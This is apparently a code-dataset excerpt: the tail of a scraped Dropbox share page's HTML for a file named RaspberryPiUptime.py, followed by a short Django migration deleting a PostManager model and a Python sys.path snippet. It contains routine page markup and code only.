"revisions_diff-vflNMCtu8", "annotate_face_detections": "annotate_face_detections-vflASD2jD", "external/keymaster": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/keymaster-vflUgLHG5", "external/zxcvbn": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/zxcvbn-vflkO7PKd", "photos/photos_show_faces": "photos/photos_show_faces-vflAgqLDd", "music_selection": "music_selection-vfl8bfKSj", "exclog/asana": "exclog/asana-vflLdHgsB", "qr_connect": "qr_connect-vfl0paeR_", "external/prototype": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prototype-vflsz33MA", "get_mobile_app": "get_mobile_app-vfloV_R1r", "hi_res": "hi_res-vflKTk4ER", "about": "about-vfli-74Cv", "external/fabric": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/fabric-vflgzn01d", "lightbox": "lightbox-vflMdtPSJ", "multiaccount": "multiaccount-vfliW5hG9", "tests/register_form": "tests/register_form-vfl3iF9kA", "notserver": "notserver-vflCqoJvC", "contacts/cache": "contacts/cache-vfl42NhbZ", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/fr/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/fr/timeline-vflOX0C5s", "control/facebook_confirm_modal": "control/facebook_confirm_modal-vflakHH6I", "widgets/login_form": "widgets/login_form-vflL7T5Hx", "components/tabs": "components/tabs-vflmUJE0E", "modal": "modal-vflUWIFh_", "admin/api_app": "admin/api_app-vflA9TLgY", "tests/viewer_tests": "tests/viewer_tests-vflVN5Os7", "tests/i18n_test": "tests/i18n_test-vflWgRLGo", "external/prettify/lang-xq": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-xq-vfl68ZmQi", "teams/reduce_licenses": "teams/reduce_licenses-vflPXlXnV", "external/require": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/require-vflqlcrZl", "components/bubble_dropdown": "components/bubble_dropdown-vflgr_lIu", "control/hosts": "control/hosts-vflY4dK4Q", "photos/photos_util": "photos/photos_util-vflNZDJ0K", "dropins/mobile_util": "dropins/mobile_util-vflbrKxdu", "ymail_test_page": "ymail_test_page-vfl70hqCk", "cookies": "cookies-vflVBrHPj", "modalflows": "modalflows-vflNNn0lt", "teams/upgrade_to_annual": "teams/upgrade_to_annual-vfl9MQ15E", "annotate_events": "annotate_events-vfl6ahglg", "external/phone_helpers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/phone_helpers-vflkZ23T7", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/es/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/es/timeline-vflYLnRPJ", "dropins_sdk/ymail": "dropins_sdk/ymail-vflSoQNHR", "client_sso": "client_sso-vflQqdYtm", "dbx_main_page": "dbx_main_page-vflFd7M68", "mobile/lightbox_previews": "mobile/lightbox_previews-vflQupTuU", "external/pdf-js/pdf-mini": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/pdf-js/pdf-mini-vfl0t3_Bz", "dropins/hostsite_generic": "dropins/hostsite_generic-vflDCLZ2M", "support": "support-vflb2tPRr", "pairing": "pairing-vfl-MWMHz", "apps": "apps-vflp69OWc", "automata": "automata-vflv9oRHZ", "exclog/exclog2": "exclog/exclog2-vflPMqpgu", "external/h5f.min": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/h5f.min-vflZUjnty", "admin/sfj": "admin/sfj-vflHTVWiw", "teams/domain_notifications_confirm_modal": "teams/domain_notifications_confirm_modal-vflpDDd4b", "widgets/ul_select_menu": "widgets/ul_select_menu-vflxfbRFu", "external/mailcheck": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/mailcheck-vflNl7qw_", "mobile/widgets": "mobile/widgets-vfl2Ko242", "external/highcharts": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/highcharts-vflbJ-B9j", "twitter": "twitter-vflKeXP7o", "dropins/login": "dropins/login-vfl-6H9FK", "external/codemirror-0.91/js/highlight": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/highlight-vflbSMPe8", "external/flash_detect": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/flash_detect-vflLuenon", "teams/member_requests_table": "teams/member_requests_table-vfl84tfjf", "prototype_extensions": "prototype_extensions-vflyhf_uw", "browse/browse_util": "browse/browse_util-vfljOogFC", "table_filter": "table_filter-vflfalr2x", "external/colorspin": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/colorspin-vflXAKFcl", "dropins/hostsite_fb": "dropins/hostsite_fb-vfl_fDQOj", "developers_graphs": "developers_graphs-vflnEDkp8", "control/alias_modals": "control/alias_modals-vflJWNYm8", "jquery": ["https://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min", "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jquery-vflrOa9og", "https://www.dropboxstatic.com/static/javascript/external/jquery-vflrOa9og"], "external/beautify": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/beautify-vfl1l41LM", "sharing/token_manager": "sharing/token_manager-vflvT_YBM", "control/home": "control/home-vflV0E5kL", "automata_console": "automata_console-vflooEKQG", "sharing/token": "sharing/token-vflSgjSkn", "browse/browse_selection": "browse/browse_selection-vflFSIw7I", "mobile": ["https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/dropbox-mobile-mini-vflc5eZjM", "https://www.dropboxstatic.com/static/javascript/compiled/dropbox-mobile-mini-vflc5eZjM"], "mobile/util": "mobile/util-vflyMKA4I", "admin/restore_paged": "admin/restore_paged-vflYz5lfG", "widgets/text_input_date_picker": "widgets/text_input_date_picker-vflWFSxCC", "annotate_dups": "annotate_dups-vfllJiK0D", "external/codemirror-0.91/js/codemirror": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/codemirror-vflSSvLE4", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/se/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/se/labellers-vfl4Q8hfZ", "referral_page": "referral_page-vflPnJVs5", "external/scriptaculous/effects": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/scriptaculous/effects-vflWyM_nb", "bug_reporter": "bug_reporter-vflfMXHB-", "tests/phone_helpers_test": "tests/phone_helpers_test-vflMVdrD0", "dropins_sdk/base": "dropins_sdk/base-vflC7F7sS", "business_two_account_splash": "business_two_account_splash-vfl7kT9xM", "external/tablekit": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/tablekit-vflw6NN60", "viewer": "viewer-vflXzepfD", "file_selection": "file_selection-vfl_phrDQ", "browse/file_types": "browse/file_types-vfl3MgmqO", "teams/domains": "teams/domains-vfl8c-6Ku", "external/codemirror-0.91/js/tokenizejavascript": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/tokenizejavascript-vfl1_UxPq", "external/codemirror-0.91/js/parsesparql": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/parsesparql-vflQl6y2g", "admin/i18n": "admin/i18n-vfl7ZqJ3M", "developers_toc": "developers_toc-vfl9e3dIF", "widgets/act_as_block": "widgets/act_as_block-vflwTt4T5", "external/prettify/lang-vhdl": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-vhdl-vfleKIBCr", "sharing/autocompleter_team_tokenizer": "sharing/autocompleter_team_tokenizer-vfluYtb1L", "links/recent_links": "links/recent_links-vfl3xd0rU", "external/purl": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/purl-vflcjHlOb", "components/input": "components/input-vfl-BS9Te", "external/codemirror-0.91/contrib/java/js/tokenizejava": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/java/js/tokenizejava-vfljAyJq1", "external/prettify/lang-lua": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-lua-vflGEdkRV", "widgets/date_picker_input": "widgets/date_picker_input-vflZieP44", "external/codemirror-0.91/js/parsecss": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/parsecss-vflw77HTL", "browse/browse_drag": "browse/browse_drag-vflbcQyyl", "external/prettify/lang-proto": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-proto-vflhz79A8", "external/prettify/lang-go": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-go-vflRea47Z", "facebook_oauth": "facebook_oauth-vfl9SOPOx", "external/codemirror-0.91/contrib/lua/js/parselua": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/lua/js/parselua-vflrki2Pl", "external/prettify/lang-wiki": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-wiki-vflbk7KSp", "external/moxie": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/moxie-vflSD4pjN", "external/codemirror-0.91/contrib/ometa/js/tokenizeometa": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/ometa/js/tokenizeometa-vflDe6cS3", "request_watcher": "request_watcher-vfl69rFp3", "external/codemirror-0.91/contrib/scheme/js/tokenizescheme": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/scheme/js/tokenizescheme-vflVhaZk4", "external/prettify/lang-yaml": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-yaml-vfl4DZ_ky", "widgets/bubble": "widgets/bubble-vflHBju3g", "dom_util": "dom_util-vfl9c-jXO", "control/email_verification": "control/email_verification-vfl7giC4Z", "external/codemirror-0.91/js/tokenize": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/tokenize-vflwAgUMq", "dropbox": ["https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/dropbox-mini-vflObOMH3", "https://www.dropboxstatic.com/static/javascript/compiled/dropbox-mini-vflObOMH3"], "external/jquery_payment": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jquery_payment-vflV9_lEJ", "links/merged_links": "links/merged_links-vfl3b11N5", "teams/add_licenses": "teams/add_licenses-vflia683v", "external/braintree-data": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/braintree-data-vflYTjGak", "components/tooltip": "components/tooltip-vflbjscZ8", "tests/notserver": "tests/notserver-vflOHAd4s", "connect_v3_mobile": ["https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/connect-v3-mobile-mini-vfld3rfmR", "https://www.dropboxstatic.com/static/javascript/compiled/connect-v3-mobile-mini-vfld3rfmR"], "sharing/invite_form_controller": "sharing/invite_form_controller-vflY3HbLC", "admin/email": "admin/email-vfltDegkr", "control/downloading": "control/downloading-vfl6Ta2nX", "exclog/exclog2_view": "exclog/exclog2_view-vflK4DjLs", "teams/domain_invites_user_modal": "teams/domain_invites_user_modal-vflOS_lUb", "admin/gandalf": "admin/gandalf-vflx_j5J7", "control/sso_login_checks": "control/sso_login_checks-vflk7QEq3", "admin/collection": "admin/collection-vflCfKPPn", "scroll": "scroll-vflIme-dS", "external/scriptaculous/controls": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/scriptaculous/controls-vflMfBykE"};</script><script src="https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/require-vflSK92_s.js" type="text/javascript"></script><script type="text/javascript">requirejs(['dropbox'])</script><style type="text/css">.hny-dxvr { display: none; }</style><!--[if lt IE 9]><script src="/static/javascript/external/html5shiv.js"></script><![endif]-->
<style type="text/css" media="screen">
html {
overflow: auto;
}
</style>
<link href="https://dt8kf6553cww8.cloudfront.net/static/css/shmodel_print-vflWHY0im.css" type="text/css" rel="stylesheet" /><link href="https://dt8kf6553cww8.cloudfront.net/static/css/sprite-div-vflt7CFDK.css" type="text/css" rel="stylesheet" /><link href="https://dt8kf6553cww8.cloudfront.net/static/css/syntax-vfljUnWvZ.css" type="text/css" rel="stylesheet" /><script>
if (self != top) {
top.location.replace(self.location.href);
setTimeout(function() {
document.body.innerHTML = (
"<img src='https://www.dropbox.com/static/images/logo.png' onClick='top.location.href=window.location.href' />");
}, 1);
}
</script></head><body class="en file-preview-body shmodel-body deferred-resources"><div style="display: none;" id="db-modal-simple_modal" class="db-modal-wrapper"><div class="db-modal-overlay"></div><div class="db-modal"><div class="db-modal-box"><a href="#" class="db-modal-x"></a><h2 class="db-modal-title"><div class="db-modal-title-text"></div></h2><div class="db-modal-content"><div class="simple-modal-content"></div><div class="db-modal-buttons"><span class="ajax-loading-indicator"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/ajax-loading-small-vfl3Wt7C_.gif" /></span><input type="button" class="confirm-button freshbutton-blue " value="Confirm" /><input type="button" class="cancel-button freshbutton-silver" value="Cancel" /></div></div></div></div></div><div style="display: none;" id="modal-behind"></div><div style="display: none;" id="modal"><div id="modal-box"><a href="#" id="modal-x" onclick="javascript: Modal.hide(null, false, true); Event.stop(event); return false;"></a><h2 id="modal-title"></h2><div id="modal-content"></div></div></div><div style="display: none;" id="modal-overlay"></div><div style="display:none" id="grave-yard"></div><div style="display:none" id="trash-can"></div><script type="text/template" id="tutorial_nav_bubble_tmpl"><div class="tutorial-bubble-content"><a class="tutorial-bubble-x-link"><img src="/static/images/x-small-active.png" class="tutorial-bubble-x-img" /></a><h1 class="tutorial-bubble-title"><%= title %></h1><p class="tutorial-bubble-body"><%= body %></p><a class="tutorial-bubble-button <%= button_class %>"><%= button_text %></a></div></script><div id="floaters"></div><div style="display: none;" class="external-drop-indicator top"></div><div style="display: none;" class="external-drop-indicator right"></div><div style="display: none;" class="external-drop-indicator bottom"></div><div style="display: none;" class="external-drop-indicator left"></div><div id="notify-wrapper"><span style="display: none;" id="notify"><span id="notify-msg">Sorry, there was a problem loading this page.</span></span></div><div id="outer-frame"> <div style="display: none;" id="db-modal-locale-selector-modal" class="db-modal-wrapper"><div class="db-modal-overlay"></div><div class="db-modal"><div class="db-modal-box"><a href="#" class="db-modal-x"></a><h2 class="db-modal-title"><div class="db-modal-title-text">Choose a language</div></h2><div class="db-modal-content"><table><tr><td><ul><li><a data-locale="id" class="locale-option">Bahasa Indonesia</a></li><li><a data-locale="ms" class="locale-option">Bahasa Malaysia</a></li><li><a data-locale="de" class="locale-option">Deutsch</a></li><li><a data-locale="en" class="locale-option">English</a></li><li><a data-locale="es_ES" class="locale-option">Español (España)</a></li><li><a data-locale="es" class="locale-option">Español (Latinoamérica)</a></li><li><a data-locale="fr" class="locale-option">Français</a></li><li><a data-locale="it" class="locale-option">Italiano</a></li></ul></td><td><ul><li><a data-locale="pl" class="locale-option">Polski</a></li><li><a data-locale="pt_BR" class="locale-option">Português (Brasil)</a></li><li><a data-locale="ru" class="locale-option">Pусский</a></li><li><a data-locale="zh_CN" class="locale-option">中文(简体)</a></li><li><a data-locale="zh_TW" class="locale-option">中文(繁體)</a></li><li><a data-locale="ja" class="locale-option">日本語</a></li><li><a data-locale="ko" class="locale-option">한국어</a></li></ul></td></tr></table></div></div></div></div><div id="page-content"><div class="nav-header"><a href="//www.dropbox.com?src=shmodel" target="_top" class="logo"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/header/header_logo_shmodel-vflsZ7QsE.png" alt="Dropbox" data-hi-res="https://dt8kf6553cww8.cloudfront.net/static/images/header/header_logo_shmodel@2x-vflvJX68X.png" /></a> <div class="filename shmodel-filename"><span id="pyxl9201789708051613151"></span></div> <div class="buttons"><a href="#" class="freshbutton-blue freshdropdown-button" onclick="SharingModel.toggle_dropdown(event, $("download-menu"), $("download-menu-button"))" id="download-menu-button">Download<img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_arrow_white" /></a><div style="display: none;" id="download-menu" class="chat-bubble freshdropdown-menu"><ul><li><a href="https://dl.dropboxusercontent.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py?dl=1&token_hash=AAFkDXJudM03AvF7JseUg8f4VJDlIfpAl9EIIu5bwRXIkw" id="download_button_link" onclick="FreshDropdown.hide_all()"><div class="sprite-div"><div class="sprite-frame small icon-left"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_download_arrow" /></div><div class="sprite-text">Direct download</div></div></a></li><li><a class="a2md-button" onclick="SharingModel.show_c2d_modal(); return false;" id="add_to_my_dropbox_link"><div class="sprite-div"><div class="sprite-frame small icon-left"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_dropbox" /></div><div class="sprite-text">Copy to my Dropbox</div></div></a></li></ul><div class="chat-bubble-arrow-border"></div><div class="chat-bubble-arrow"></div></div><a href="#" class="freshbutton-lightblue freshdropdown-button" onclick="SharingModel.toggle_dropdown(event, $("non-owner-menu"), $("non-owner-menu-button"))" id="non-owner-menu-button"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_more" /></a><div style="display: none;" id="non-owner-menu" class="chat-bubble freshdropdown-menu"><ul><li><a id="print-button"><div class="sprite-div"><div class="sprite-frame small icon-left"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_printer" /></div><div class="sprite-text">Print</div></div></a></li></ul><div class="chat-bubble-arrow-border"></div><div class="chat-bubble-arrow"></div></div> <div id="account-header"><ul class="nav"><li id="top-login"><div id="top-login-wrapper"><a href="/login" id="login-hover-link">Sign in<img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" style="padding: 0; margin-left: 5px; margin-top: -1px;" class="s_web_arrow-down-blue link-img sprite sprite_web" id="login-hover-dropdown-icon" /></a><div id="login-hover-cont" class="offscreen chat-bubble"><form action="https://www.dropbox.com/login?cont=https%3A//www.dropbox.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py" novalidate="novalidate" method="post"><input type="hidden" name="t" value="8j8BaT-RNXpqPrZXN5bmAKpD" /><div class="sick-input small"><label for="login_email_elm">Email</label><input type="email" id="login_email_elm" name="login_email" tabindex="1" /></div><div class="sick-input small"><label for="login_password_elm">Password</label><input type="password" id="login_password_elm" name="login_password" tabindex="2" /></div><p style="margin-bottom: 0.5em; line-height: 28px;" class="top-login-remember-me"><input style="vertical-align: middle; margin-left: 0;" checked="True" name="remember_me" class="no-border" type="checkbox" id="remember_me" tabindex="3" /><label style="vertical-align: middle; cursor: pointer; " for="remember_me">Remember me</label><input tabindex="4" type="submit" class="freshbutton-blue" value="Sign in" id="toplogin-submit" /><input type="hidden" name="cont" value="https://www.dropbox.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py" /></p><p class="create-account"><a href="/register" id="login-create-an-account">Sign up for Dropbox</a></p></form><div class="chat-bubble-arrow-border"></div><div class="chat-bubble-arrow"></div></div></div></li></ul></div></div></div><div id="shmodel-content-area"><div id="default-content"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons128/page_white_code-vflEPhKac.png" class="bigicon" /><div class="filename shmodel-filename"><span id="pyxl473298661475077978"></span></div><div class="meta">7 weeks ago · 6.3 KB</div><a href="https://dl.dropboxusercontent.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py?dl=1&token_hash=AAFkDXJudM03AvF7JseUg8f4VJDlIfpAl9EIIu5bwRXIkw" id="default_content_download_button" class="freshbutton-blue">Download</a><a class="freshbutton-lightblue" onclick="SharingModel.show_c2d_modal(); return false;" id="default_content_a2md">Copy to my Dropbox</a></div><div class="filename-below shmodel-filename"><span id="pyxl8906731819148669824"></span></div><div class="preview-box"><div id="code-wrapper" class="content-shadow"><div id="code-loading" class="center"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/ajax-loading-small-vfl3Wt7C_.gif" alt="" class="text-img" />Loading...</div><pre id="code" class="brush: py;"></pre></div></div><a href="/copyright_complaint?ssu=https%3A//www.dropbox.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py" class="content-flag title_bubble" rel="nofollow" title="Flag for copyright">Flag for copyright</a></div><div style="display:none;" id="disable-token-modal"><p class="disable-token-desc"></p><div class="modal-buttons"><input value="Remove link" type="button" class="freshbutton-blue" onclick="SharingModel.do_remove(Modal.vars);" /><input value="Cancel" type="button" class="freshbutton" onclick="Modal.hide();" /></div></div><div style="display:none;" id="album-disable-token-modal"><p>Are you sure you want to unshare <span class="album_unshare_name"></span>? Once it's unshared, nobody else will be able to view it.</p><div class="modal-buttons"><input value="Unshare" type="button" class="freshbutton-blue" onclick="SharingModel.do_remove(Modal.vars);" /><input value="Cancel" type="button" class="freshbutton" onclick="Modal.hide();" /></div></div><div style="display: none;" id="c2d-modal"><ul id="c2d-modal-tabs" class="modal-tabs clearfix"><li><a href="#" id="create-account" class="selected">Create an account</a></li><li><a href="#" id="login-account">Sign in</a></li></ul><div id="create-account-content"><p><span class="c2d-create-account-desc"></span></p><br /><div><form novalidate="novalidate" method="post" id="c2d-register-form"><input type="hidden" name="t" value="8j8BaT-RNXpqPrZXN5bmAKpD" /><input type="hidden" name="signup_tag" value="copy_to_dropbox" /><div id="register-partial"><div style="display:none;" class="error-plain-text"><form:error name="fname" /></div><div id="fname-field" class="sick-input"><input autocomplete="off" tabindex="5" type="text" name="fname" id="fname" /><label id="fname-label" for="fname">First name</label></div><div style="display:none;" class="error-plain-text"><form:error name="lname" /></div><div id="lname-field" class="sick-input"><input autocomplete="off" tabindex="6" type="text" name="lname" id="lname" /><label id="lname-label" for="lname">Last name</label></div><div class="register-spacer"></div><div style="display:none;" class="error-plain-text"><form:error name="email" /></div><div id="email-field" class="sick-input clearfix"><input autocomplete="off" tabindex="7" type="email" name="email" id="email" /><label id="email-label" for="email">Email</label><div style="display: none;" id="email_check_warning"></div></div><div style="display:none;" class="error-plain-text"><form:error name="password" /></div><div id="password-field" class="sick-input"><input autocomplete="off" tabindex="8" type="password" name="password" id="password" /><label id="password-label" for="password">Password</label></div><div id="register-footer"><div id="tos-agree-field"><label for="tos_agree"><input type="checkbox" id="tos_agree" name="tos_agree" tabindex="9" /> I agree to <a href="/terms" target="_blank">Dropbox Terms</a></label><div style="display:none;" class="error-plain-text"><form:error name="tos_agree" /></div></div><input type="hidden" name="register-submit" value="1" /><input name="register-submit-dummy" value="Create account" class="freshbutton-blue" type="submit" id="register-submit" tabindex="10" /></div><br class="clear" /></div></form></div></div><div style="display:none;" id="login-account-content"><div id="c2d-login"><p><span class="c2d-login-desc"></span></p><br /><form novalidate="novalidate" method="post" id="c2d-login-form"><input type="hidden" name="t" value="8j8BaT-RNXpqPrZXN5bmAKpD" /><input type="hidden" name="cont" value="https://www.dropbox.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py?show_c2d_modal=true" /><table id="login-table"><tr><td><div style="display:none;" class="error-plain-text"><form:error name="login_email" /></div><div class="sick-input"><label for="email">Email</label><input autocomplete="off" type="text" name="login_email" tabindex="13" /></div></td></tr><tr><td style="padding: 10px 0;"><div style="display:none;" class="error-plain-text"><form:error name="login_password" /></div><div class="sick-input"><label for="password">Password</label><input autocomplete="off" type="password" name="login_password" tabindex="14" /></div></td></tr><tr><td><input style="float:right" name="login_submit" value="Sign in" class="freshbutton-blue" type="submit" id="login_submit" tabindex="15" /></td></tr></table></form></div><div style="display: none;" id="c2d-twofactor-login"><p class="c2d-header">Enter security code</p><p id="sms-msg">We sent a security code to your phone ending in <span class="last-four-digits"></span>.</p><p id="offline-msg">Enter the security code generated by your mobile authenticator app.</p><br /><form novalidate="novalidate" method="post" id="c2d-twofactor-login-form"><input type="hidden" name="t" value="8j8BaT-RNXpqPrZXN5bmAKpD" /><div id="c2d-twofactor-error" class="error-message"></div><div class="sick-input"><label for="email">6-digit code</label><input autocomplete="off" type="text" id="c2d-twofactor-code" name="twofactor_code" tabindex="13" /></div><input name="twofactor_login_submit" value="Submit code" class="freshbutton-blue" type="submit" id="twofactor_login_submit" tabindex="15" /><p class="resend-code"><a id="c2d-resend-link">Didn't receive one?</a></p></form></div></div></div>
<script type="text/template" id="lightbox_more_actions_item_tmpl">
<%
_id = (typeof _id !== 'undefined') ? _id : '';
_href = (typeof _href !== 'undefined') ? _href : '';
_target = (typeof _target !== 'undefined') ? _target : '';
more_classes = (typeof more_classes !== 'undefined') ? more_classes : '';
divider = ((typeof divider !== 'undefined') && (divider));
%>
<% if (divider) { %>
<li class="divider <%= more_classes %>" />
<% } else { %>
<li id="<%= _id %>" class="<%= more_classes %>" >
<a href="<%= _href %>" target="<%= _target %>">
<%= Sprite.html('web', sprite_name) %>
<div>
<%= item_text %>
</div>
</a>
</li>
<% } %>
</script>
<div style="display:none;" id="file-preview-modal"><div class="modal-preview-content"><div class="preview"><table class="preview-container-parent"><tr><td class="preview-container"><div class="preview-content"></div></td></tr></table></div> <div id="file-preview-menu" class="menu"><div class="file-title lightbox-not-important"><span class="album-name"> </span><span class="filename"> </span><span class="added-by"> </span></div><div class="actions"> </div><div class="paging lightbox-not-important"><div class="paging-block"><a href="#" class="prev"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_lightbox_prev" /></a><div class="lightbox-index-text-container"></div><a href="#" class="next"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_lightbox_next" /></a></div></div></div><div style="display:none;" id="lightbox-more-actions-menu" class="freshdropdown-menu big black chat-bubble-bottom"><ul id="lightbox-more-actions-list"></ul><div class="chat-bubble-arrow-border black"></div><div class="chat-bubble-arrow black"></div></div> <div style="display:none;" class="delete-file-prompt chat-bubble-bottom"><input type="button" id="lightbox-delete-photo" value="Delete" class="freshbutton-blue" /><br /><input type="button" id="lightbox-delete-cancel" value="Cancel" class="freshbutton" /><div class="chat-bubble-arrow-border black"></div><div class="chat-bubble-arrow black"></div></div></div><div class="header"><a href="#" class="close lightbox-not-important"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_lightbox_close" /></a></div></div></div><noscript><p class="center">The Dropbox website requires JavaScript.</p></noscript></div><div style="position: absolute; top: 0; left: 0; font-family: Courier" id="ieconsole"></div><div style="position:absolute; top:-10000px;width:0px; height:0px; left: 0;" id="FB_HiddenContainer"></div><div style="display:none;" id="notice-container" class="clearfix"></div><script src="https://dt8kf6553cww8.cloudfront.net/static/javascript/external/syntax-vflpNqebu.js" type="text/javascript"></script><script src="https://dt8kf6553cww8.cloudfront.net/static/coffee/compiled/logger-vflXdXO8C.js" type="text/javascript"></script><script src="https://dt8kf6553cww8.cloudfront.net/static/javascript/password_strength-vflwq0t9x.js" type="text/javascript"></script><script>
if (window.requirejs) {
requirejs(["dropbox"], function(dropbox) { SharingModel.init("RaspberryPiUptime.py", {"secure_hash": "", "subpath": "", "tkey": "zdgnrgum7zs8nal"}); SharingModel.set_team_only_shmodel(null, null);
$j('#print-button').click(function() {
requirejs(['print'], function(print) { print.print(); });
});
Util.remove_param_from_url('m');
SharingModel.init_file()
Util.smartLoad(function() {
Util.focus("");
Cookies.check_cookies_enabled();
WebTimingLogger.init();
});
$j("#pyxl9201789708051613151").text("RaspberryPiUptime.py".em_snippet(50, 0.750000));
$j("#pyxl473298661475077978").text("RaspberryPiUptime.py".em_snippet(20, 0.750000));
$j("#pyxl8906731819148669824").text("RaspberryPiUptime.py".em_snippet(20, 0.750000));
FilePreview.init_text("https://dl.dropboxusercontent.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py?token_hash=AAFkDXJudM03AvF7JseUg8f4VJDlIfpAl9EIIu5bwRXIkw", 1, null, 0)
window.c2d_tabs = new TabController("c2d-modal-tabs", {url_prefix: false})
Util.smartLoad(function () {
PasswordStrength.watch("password");
});
new MailCheck('email', 'email_check_warning');
});
} else {
var onload_js = function() { SharingModel.init("RaspberryPiUptime.py", {"secure_hash": "", "subpath": "", "tkey": "zdgnrgum7zs8nal"}); SharingModel.set_team_only_shmodel(null, null);
$j('#print-button').click(function() {
requirejs(['print'], function(print) { print.print(); });
});
Util.remove_param_from_url('m');
SharingModel.init_file()
Util.smartLoad(function() {
Util.focus("");
Cookies.check_cookies_enabled();
WebTimingLogger.init();
});
$j("#pyxl9201789708051613151").text("RaspberryPiUptime.py".em_snippet(50, 0.750000));
$j("#pyxl473298661475077978").text("RaspberryPiUptime.py".em_snippet(20, 0.750000));
$j("#pyxl8906731819148669824").text("RaspberryPiUptime.py".em_snippet(20, 0.750000));
FilePreview.init_text("https://dl.dropboxusercontent.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py?token_hash=AAFkDXJudM03AvF7JseUg8f4VJDlIfpAl9EIIu5bwRXIkw", 1, null, 0)
window.c2d_tabs = new TabController("c2d-modal-tabs", {url_prefix: false})
Util.smartLoad(function () {
PasswordStrength.watch("password");
});
new MailCheck('email', 'email_check_warning');
};
if (window.Prototype) {
document.observe('script:loaded', onload_js);
} else if (window.jQuery) {
jQuery(onload_js);
}
}
</script></body></html> |
19,716 | 7675ec468650282254f3fa87a41108050e7626f6 | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2018-06-02 06:54
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posts', '0001_initial'),
]
operations = [
migrations.DeleteModel(
name='PostManager',
),
]
|
19,717 | 475d0251248d1d454e6dd485c21de32c03d8d6e4 | import sys
import os
currentDir = os.getcwd()
sys.path.insert(0,currentDir+"/src")
